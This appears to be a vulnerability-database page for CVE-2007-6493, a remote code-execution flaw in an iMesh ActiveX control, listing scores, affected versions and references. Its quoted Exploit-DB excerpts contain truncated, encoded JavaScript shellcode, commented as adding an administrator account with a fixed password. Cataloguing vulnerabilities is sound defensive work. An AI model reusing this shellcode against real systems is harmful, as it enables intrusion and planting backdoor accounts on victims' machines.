CVE-2007-6493
published 2007-12-20CVE-2007-6493: The IMWeb.IMWebControl.1 ActiveX control in IMWeb.dll 7.0.0.x, and possibly IMWebControl.dll, in iMesh 7.1.0.x and earlier allows remote attackers to execute…
PriorityP350critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
6.76%
93.2th percentile
The IMWeb.IMWebControl.1 ActiveX control in IMWeb.dll 7.0.0.x, and possibly IMWebControl.dll, in iMesh 7.1.0.x and earlier allows remote attackers to execute arbitrary code via a certain argument to the SetHandler method.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| imesh.com | imesh | <= 7.1.0.37263 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow
exploitdb·2007-12-18
CVE-2007-6493 iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow
iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow
---
//add su one, user: sun pass: tzu
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u
Exploit-DB
iMesh 7 - 'IMWebControl' ActiveX Control Code Execution
exploitdb·2007-12-17
CVE-2007-6493 iMesh 7 - 'IMWebControl' ActiveX Control Code Execution
iMesh 7 - 'IMWebControl' ActiveX Control Code Execution
---
source: https://www.securityfocus.com/bid/26916/info
iMesh is prone to a code-execution vulnerability because the application fails to sanitize user-supplied data, which can lead to memory corruption.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
iMesh 7.1.0.37263 and prior versions are reported affected by this issue.
//add su one, user: sun pass: tzu
shellcode =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u
No writeups or analysis indexed.
http://osvdb.org/40239http://retrogod.altervista.org/rgod_imesh.htmlhttp://secunia.com/advisories/28134http://www.securityfocus.com/archive/1/485261/100/0/threadedhttp://www.vupen.com/english/advisories/2007/4240http://osvdb.org/40239http://retrogod.altervista.org/rgod_imesh.htmlhttp://secunia.com/advisories/28134http://www.securityfocus.com/archive/1/485261/100/0/threadedhttp://www.vupen.com/english/advisories/2007/4240
2007-12-20
Published